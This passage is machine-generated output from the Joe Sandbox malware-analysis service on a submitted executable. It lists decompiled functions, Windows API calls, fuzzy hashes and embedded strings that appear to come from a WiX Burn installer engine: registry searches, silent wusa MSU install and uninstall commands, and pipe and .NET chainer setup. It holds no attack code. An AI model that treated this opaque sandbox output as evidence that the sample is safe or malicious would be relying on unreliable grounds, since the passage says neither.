                                                            • variable.cpp, xrefs: 008787B9
                                                            • Failed to get variable node count., xrefs: 008784E1
                                                            • Failed to set value of variable: %ls, xrefs: 008787A7
                                                            • string, xrefs: 008785F7
                                                            • Failed to get next node., xrefs: 008787F6
                                                            • Attempt to set built-in variable value: %ls, xrefs: 008787C8
                                                            • Failed to get @Id., xrefs: 008787EF
                                                            • Initializing numeric variable '%ls' to value '%ls', xrefs: 008785E2
                                                            • Failed to find variable value '%ls'., xrefs: 008787D2
                                                            • Hidden, xrefs: 0087852F
                                                            • Failed to get @Value., xrefs: 00878796
                                                            • Failed to insert variable '%ls'., xrefs: 008786C6
                                                            • Initializing version variable '%ls' to value '%ls', xrefs: 00878653
                                                            • Failed to change variant type., xrefs: 008787DA
                                                            • Failed to select variable nodes., xrefs: 008784C4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave
                                                            • String ID: Attempt to set built-in variable value: %ls$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant encryption$Failed to set variant value.$Hidden$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$numeric$string$variable.cpp$version
                                                            • API String ID: 3168844106-1614826165
                                                            • Opcode ID: 865d058479e96a88f43d8f5f960020a04fd56b9ce575007e96de9d0f28d899c2
                                                            • Instruction ID: 1c5d92f8e8ffae4f7a6bfed1aa2c3e8d77c5fd5662f361757142d2ccf6eb7cf0
                                                            • Opcode Fuzzy Hash: 865d058479e96a88f43d8f5f960020a04fd56b9ce575007e96de9d0f28d899c2
                                                            • Instruction Fuzzy Hash: 03B1AD72D80229FBCB159A98CC49EEEBB74FF04750F208250F929F6394CB75DA409B91
                                                            Function 00896CCC Relevance: 58.1, APIs: 7, Strings: 26, Instructions: 379COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,0088BDDC,00000007,?,?,?), ref: 00896D20
                                                              • Part of subcall function 008B0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00875EB2,00000000), ref: 008B0AE0
                                                              • Part of subcall function 008B0ACC: GetProcAddress.KERNEL32(00000000), ref: 008B0AE7
                                                              • Part of subcall function 008B0ACC: GetLastError.KERNEL32(?,?,?,00875EB2,00000000), ref: 008B0AFE
                                                            • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 0089710F
                                                            • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 00897123
                                                            Strings
                                                            • "%ls" /uninstall /kb:%ls /quiet /norestart, xrefs: 00896E75
                                                            • Failed to find Windows directory., xrefs: 00896D5F
                                                            • Failed to append SysNative directory., xrefs: 00896D7D
                                                            • Failed to ensure WU service was enabled to install MSU package., xrefs: 00896F2E
                                                            • 2, xrefs: 00896FB3
                                                            • wusa.exe, xrefs: 00896DA0
                                                            • Failed to find System32 directory., xrefs: 00896D95
                                                            • SysNative\, xrefs: 00896D6A
                                                            • Failed to append log path to MSU command-line., xrefs: 00896ED4
                                                            • WixBundleExecutePackageCacheFolder, xrefs: 00896E0B, 0089713B
                                                            • /log:, xrefs: 00896EA2
                                                            • Failed to wait for executable to complete: %ls, xrefs: 0089709E
                                                            • Failed to build MSU path., xrefs: 00896E35
                                                            • Failed to determine WOW64 status., xrefs: 00896D32
                                                            • Failed to get process exit code., xrefs: 0089702C
                                                            • Failed to format MSU install command., xrefs: 00896E5C
                                                            • Failed to append log switch to MSU command-line., xrefs: 00896EB6
                                                            • Failed to format MSU uninstall command., xrefs: 00896E89
                                                            • Failed to get cached path for package: %ls, xrefs: 00896DFC
                                                            • Failed to CreateProcess on path: %ls, xrefs: 00896F9A
                                                            • "%ls" "%ls" /quiet /norestart, xrefs: 00896E48
                                                            • msuengine.cpp, xrefs: 00896F8D, 00897022, 0089704A
                                                            • Failed to get action arguments for MSU package., xrefs: 00896DD6
                                                            • Bootstrapper application aborted during MSU progress., xrefs: 00897054
                                                            • D, xrefs: 00896F3B
                                                            • Failed to allocate WUSA.exe path., xrefs: 00896DB3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Handle$Close$AddressCurrentErrorLastModuleProcProcess
                                                            • String ID: /log:$"%ls" "%ls" /quiet /norestart$"%ls" /uninstall /kb:%ls /quiet /norestart$2$Bootstrapper application aborted during MSU progress.$D$Failed to CreateProcess on path: %ls$Failed to allocate WUSA.exe path.$Failed to append SysNative directory.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to determine WOW64 status.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to find Windows directory.$Failed to format MSU install command.$Failed to format MSU uninstall command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to get process exit code.$Failed to wait for executable to complete: %ls$SysNative\$WixBundleExecutePackageCacheFolder$msuengine.cpp$wusa.exe
                                                            • API String ID: 1400713077-4261965642
                                                            • Opcode ID: b4b438ea40f5e88ddb961f4c122f83ffbcee19de9f3ca0539cd27c3de5ce6c3f
                                                            • Instruction ID: 501e39a89d002083337b3dbb4655377c6a243a51fc9fe54bcb25a713ae350e99
                                                            • Opcode Fuzzy Hash: b4b438ea40f5e88ddb961f4c122f83ffbcee19de9f3ca0539cd27c3de5ce6c3f
                                                            • Instruction Fuzzy Hash: A3D1AE71A4070AAAEF11BFA8CC85FAEBBB8FF14304F144039F614E2251E7B5D9549B51
                                                            Function 008B744A Relevance: 47.6, APIs: 13, Strings: 14, Instructions: 340COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,generator,000000FF,?,?,?), ref: 008B755D
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B7726
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B77C3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: String$FreeHeap$AllocateCompareProcess
                                                            • String ID: ($@$`<u$atomutil.cpp$author$category$entry$generator$icon$link$logo$subtitle$title$updated
                                                            • API String ID: 1555028553-639730868
                                                            • Opcode ID: cfa57f162bb3ae8a3796231a5cf38fb48986999a2f70690019dd69cb41a1a4a4
                                                            • Instruction ID: d1a3015b997627d0f00114b7bdc68de31f2d369740a47b329ff0fbc2b4fcc23b
                                                            • Opcode Fuzzy Hash: cfa57f162bb3ae8a3796231a5cf38fb48986999a2f70690019dd69cb41a1a4a4
                                                            • Instruction Fuzzy Hash: 5EB14C3194872ABBDB219BA4CC81EAEB764FB44730F200355F521EA3D1DB70EA50DB95
                                                            Function 008B710D Relevance: 47.5, APIs: 11, Strings: 16, Instructions: 298COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,008D3E78,000000FF,?,?,?), ref: 008B71D4
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 008B71F9
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 008B7219
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 008B7235
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 008B725D
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 008B7279
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 008B72B2
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 008B72EB
                                                              • Part of subcall function 008B6D50: SysFreeString.OLEAUT32(00000000), ref: 008B6E89
                                                              • Part of subcall function 008B6D50: SysFreeString.OLEAUT32(00000000), ref: 008B6EC8
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B736F
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B741F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: String$Compare$Free
                                                            • String ID: ($`<u$atomutil.cpp$author$cabinet.dll$category$clbcatq.dll$content$feclient.dll$link$msi.dll$published$summary$title$updated$version.dll
                                                            • API String ID: 318886736-2569518843
                                                            • Opcode ID: b40a6aadc989f23fc5f479113c25ed15166e33cb569948bb28cd43ade51ca6fe
                                                            • Instruction ID: 01e772b25c03f19d908b044491789cd68eef9d1e159c56ed38d1554dae05ccd5
                                                            • Opcode Fuzzy Hash: b40a6aadc989f23fc5f479113c25ed15166e33cb569948bb28cd43ade51ca6fe
                                                            • Instruction Fuzzy Hash: D7A17F3194831ABBDB219A54CC41EEE7BA4FB04730F204365F921E67D1D774EA50DB91
                                                            Function 0089D43E Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 290synchronizationprocessCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • UuidCreate.RPCRT4(?), ref: 0089D4B3
                                                            • StringFromGUID2.OLE32(?,?,00000027), ref: 0089D4DC
                                                            • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?), ref: 0089D5C5
                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 0089D5CF
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,?,?,?,?), ref: 0089D668
                                                            • WaitForSingleObject.KERNEL32(008BB500,000000FF,?,?,?,?), ref: 0089D673
                                                            • ReleaseMutex.KERNEL32(008BB500,?,?,?,?), ref: 0089D69D
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 0089D6BE
                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 0089D6CC
                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 0089D704
                                                              • Part of subcall function 0089D33E: WaitForSingleObject.KERNEL32(?,000000FF,74DF30B0,00000000,?,?,?,?,0089D642,?), ref: 0089D357
                                                              • Part of subcall function 0089D33E: ReleaseMutex.KERNEL32(?,?,?,?,0089D642,?), ref: 0089D375
                                                              • Part of subcall function 0089D33E: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0089D3B6
                                                              • Part of subcall function 0089D33E: ReleaseMutex.KERNEL32(?), ref: 0089D3CD
                                                              • Part of subcall function 0089D33E: SetEvent.KERNEL32(?), ref: 0089D3D6
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 0089D7B9
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 0089D7D1
                                                            Strings
                                                            • Failed to CreateProcess on path: %ls, xrefs: 0089D5FE
                                                            • Failed to wait for netfx chainer process to complete, xrefs: 0089D732
                                                            • Failed to allocate event name., xrefs: 0089D53F
                                                            • NetFxChainer.cpp, xrefs: 0089D4F1, 0089D5F3, 0089D6F0, 0089D728
                                                            • D, xrefs: 0089D5AA
                                                            • NetFxEvent.%ls, xrefs: 0089D52B
                                                            • %ls /pipe %ls, xrefs: 0089D57F
                                                            • Failed to allocate netfx chainer arguments., xrefs: 0089D593
                                                            • Failed to get netfx return code., xrefs: 0089D6FA
                                                            • Failed to convert netfx chainer guid into string., xrefs: 0089D4FB
                                                            • Failed to allocate section name., xrefs: 0089D51D
                                                            • Failed to process netfx chainer message., xrefs: 0089D648
                                                            • Failed to create netfx chainer., xrefs: 0089D55E
                                                            • Failed to create netfx chainer guid., xrefs: 0089D4C0
                                                            • NetFxSection.%ls, xrefs: 0089D509
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Wait$ErrorLastMutexObjectReleaseSingle$CloseCreateHandleProcess$CodeEventExitFromMultipleObjectsStringUuid
                                                            • String ID: %ls /pipe %ls$D$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate netfx chainer arguments.$Failed to allocate section name.$Failed to convert netfx chainer guid into string.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxChainer.cpp$NetFxEvent.%ls$NetFxSection.%ls
                                                            • API String ID: 1533322865-1825855094
                                                            • Opcode ID: dd606b8a82afb8beff0401346d569f838cdd2440a4885291326dde24ddf0b8f6
                                                            • Instruction ID: f12d15e5c4ba1228b661cf2e014c16c16d717beafea89dda4e8ef0dc986c3286
                                                            • Opcode Fuzzy Hash: dd606b8a82afb8beff0401346d569f838cdd2440a4885291326dde24ddf0b8f6
                                                            • Instruction Fuzzy Hash: 51A1AD72D40329AFDF21ABA8CC45BAEB7B8FB04310F154265E918FB251D7749D408F9A
                                                            Function 008854DC Relevance: 45.7, APIs: 17, Strings: 9, Instructions: 229filepipesleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,00000000,?,008BB500,?,00000000,?,0087452F,?,008BB500), ref: 008854FD
                                                            • GetCurrentProcessId.KERNEL32(?,0087452F,?,008BB500), ref: 00885508
                                                            • SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,0087452F,?,008BB500), ref: 0088553F
                                                            • ConnectNamedPipe.KERNEL32(?,00000000,?,0087452F,?,008BB500), ref: 00885554
                                                            • GetLastError.KERNEL32(?,0087452F,?,008BB500), ref: 0088555E
                                                            • Sleep.KERNEL32(00000064,?,0087452F,?,008BB500), ref: 00885593
                                                            • SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,0087452F,?,008BB500), ref: 008855B6
                                                            • WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,0087452F,?,008BB500), ref: 008855D1
                                                            • WriteFile.KERNEL32(?,0087452F,008BB500,00000000,00000000,?,0087452F,?,008BB500), ref: 008855EC
                                                            • WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,0087452F,?,008BB500), ref: 00885607
                                                            • ReadFile.KERNEL32(?,00000000,00000004,00000000,00000000,?,0087452F,?,008BB500), ref: 00885622
                                                            • GetLastError.KERNEL32(?,0087452F,?,008BB500), ref: 0088567D
                                                            • GetLastError.KERNEL32(?,0087452F,?,008BB500), ref: 008856B1
                                                            • GetLastError.KERNEL32(?,0087452F,?,008BB500), ref: 008856E5
                                                            • GetLastError.KERNEL32(?,0087452F,?,008BB500), ref: 00885719
                                                            • GetLastError.KERNEL32(?,0087452F,?,008BB500), ref: 0088574A
                                                            • GetLastError.KERNEL32(?,0087452F,?,008BB500), ref: 0088577B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$File$NamedPipeWrite$HandleState$ConnectCurrentProcessReadSleeplstrlen
                                                            • String ID: Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$crypt32.dll$pipe.cpp
                                                            • API String ID: 2944378912-2047837012
                                                            • Opcode ID: 92bc51de97ebea8c194dd8373e78b10f5a338efaf5466bc74b02a861a1baa429
                                                            • Instruction ID: 65da4083989fe1c3d538e461cefcc6ce400e3c466d4d42bda15f97dfdf8aaef7
                                                            • Opcode Fuzzy Hash: 92bc51de97ebea8c194dd8373e78b10f5a338efaf5466bc74b02a861a1baa429
                                                            • Instruction Fuzzy Hash: FE71D676D81636ABDB20F6A98C45FAEB6A8FF14B50F114125BD11FB280E7B4CD4087E1
                                                            Function 0087A416 Relevance: 44.0, APIs: 8, Strings: 17, Instructions: 299registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 0087A45A
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 0087A480
                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,?,?,?,?,?), ref: 0087A768
                                                            Strings
                                                            • Failed to allocate memory registry value., xrefs: 0087A587
                                                            • search.cpp, xrefs: 0087A54A, 0087A57D, 0087A5D0, 0087A6D3
                                                            • Failed to get expand environment string., xrefs: 0087A6DD
                                                            • Failed to format value string., xrefs: 0087A48B
                                                            • Failed to open registry key., xrefs: 0087A4ED
                                                            • Failed to allocate string buffer., xrefs: 0087A667
                                                            • Failed to set variable., xrefs: 0087A72B
                                                            • RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 0087A740
                                                            • Registry key not found. Key = '%ls', xrefs: 0087A4B4
                                                            • Failed to read registry value., xrefs: 0087A6F6
                                                            • Failed to format key string., xrefs: 0087A465
                                                            • Failed to change value type., xrefs: 0087A70F
                                                            • Failed to query registry key value size., xrefs: 0087A554
                                                            • Failed to clear variable., xrefs: 0087A4D8
                                                            • Failed to query registry key value., xrefs: 0087A5DA
                                                            • Unsupported registry key value type. Type = '%u', xrefs: 0087A608
                                                            • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 0087A51C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Open@16$Close
                                                            • String ID: Failed to allocate memory registry value.$Failed to allocate string buffer.$Failed to change value type.$Failed to clear variable.$Failed to format key string.$Failed to format value string.$Failed to get expand environment string.$Failed to open registry key.$Failed to query registry key value size.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$search.cpp
                                                            • API String ID: 2348241696-3124384294
                                                            • Opcode ID: b9232df088da54abecbfabd01ad3ccefd24e62b3f7cc5e6e46b82e38214a187b
                                                            • Instruction ID: 6d59a6e744ec3f2d87e46f1308500616b8ef74abad4842403ddee05150dd5090
                                                            • Opcode Fuzzy Hash: b9232df088da54abecbfabd01ad3ccefd24e62b3f7cc5e6e46b82e38214a187b
                                                            • Instruction Fuzzy Hash: 3DA1D272D4022ABBCF2A9AE8CC45AEEBA78FF44710F15C121F918F6254D775D9009B93
                                                            Function 00875770 Relevance: 42.5, APIs: 5, Strings: 19, Instructions: 479stringCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(00000100,00000100,00000100,00000000,00000000,00000000,?,0087A8B4,00000100,000002C0,000002C0,00000100), ref: 00875795
                                                            • lstrlenW.KERNEL32(000002C0,?,0087A8B4,00000100,000002C0,000002C0,00000100), ref: 0087579F
                                                            • _wcschr.LIBVCRUNTIME ref: 008759A7
                                                            • LeaveCriticalSection.KERNEL32(00000100,00000000,000002C0,000002C0,00000000,000002C0,00000001,?,0087A8B4,00000100,000002C0,000002C0,00000100), ref: 00875C4A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave_wcschrlstrlen
                                                            • String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$variable.cpp
                                                            • API String ID: 1026845265-2050445661
                                                            • Opcode ID: bbb42e9f97c15bf242c1de3c7c5cf93d04d3813f9ca3181e5d04611c5c350dfe
                                                            • Instruction ID: 22a8a3838503bed361f567949992a1beeaa6dd9d2781e5646b6e99dabc8afc5b
                                                            • Opcode Fuzzy Hash: bbb42e9f97c15bf242c1de3c7c5cf93d04d3813f9ca3181e5d04611c5c350dfe
                                                            • Instruction Fuzzy Hash: 4BF19671D00729EBDB11DF688841AAF7BA4FB44B60F14C129F918EB344D7B4DE419BA2
                                                            Function 0089CE81 Relevance: 40.5, APIs: 12, Strings: 11, Instructions: 240synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,?,00000000,00000018,00000001,?,00000000,?,?,0089D558,?,?,?), ref: 0089CEC7
                                                            • GetLastError.KERNEL32(?,?,0089D558,?,?,?), ref: 0089CED4
                                                            • ReleaseMutex.KERNEL32(?), ref: 0089D13C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocateCreateErrorEventLastMutexProcessRelease
                                                            • String ID: %ls_mutex$%ls_send$Failed to MapViewOfFile for %ls.$Failed to allocate memory for NetFxChainer struct.$Failed to create event: %ls$Failed to create mutex: %ls$Failed to memory map cabinet file: %ls$NetFxChainer.cpp$failed to allocate memory for event name$failed to allocate memory for mutex name$failed to copy event name to shared memory structure.
                                                            • API String ID: 3944734951-2991465304
                                                            • Opcode ID: 549cfac51ecd36026cd1fd1f81e808a9ca683d72daffc7c7c71553832b646152
                                                            • Instruction ID: 0760b020975be26f11e6fca03f44e908d5f34117396c2fce69856a048e4757fd
                                                            • Opcode Fuzzy Hash: 549cfac51ecd36026cd1fd1f81e808a9ca683d72daffc7c7c71553832b646152
                                                            • Instruction Fuzzy Hash: 0D810476A41726BBCB21AB698C09F5ABBA4FF04720F054225FD18EB341D775DD008AE9
                                                            Function 0087EA42 Relevance: 40.5, APIs: 4, Strings: 19, Instructions: 231COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008B32F3: VariantInit.OLEAUT32(?), ref: 008B3309
                                                              • Part of subcall function 008B32F3: SysAllocString.OLEAUT32(?), ref: 008B3325
                                                              • Part of subcall function 008B32F3: VariantClear.OLEAUT32(?), ref: 008B33AC
                                                              • Part of subcall function 008B32F3: SysFreeString.OLEAUT32(00000000), ref: 008B33B7
                                                            • CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,Detect,000000FF,?,008BCA9C,?,?,Action,?,?,?,00000000,00875445), ref: 0087EB13
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,Upgrade,000000FF), ref: 0087EB5D
                                                            Strings
                                                            • Addon, xrefs: 0087EB9A
                                                            • version.dll, xrefs: 0087EB70
                                                            • cabinet.dll, xrefs: 0087EBBA
                                                            • comres.dll, xrefs: 0087EB26
                                                            • Failed to resize Upgrade code array in registration, xrefs: 0087EC35
                                                            • Failed to resize Addon code array in registration, xrefs: 0087EC3C
                                                            • Failed to resize Detect code array in registration, xrefs: 0087EC2E
                                                            • Failed to get RelatedBundle element count., xrefs: 0087EA97
                                                            • Patch, xrefs: 0087EBDD
                                                            • Detect, xrefs: 0087EB04
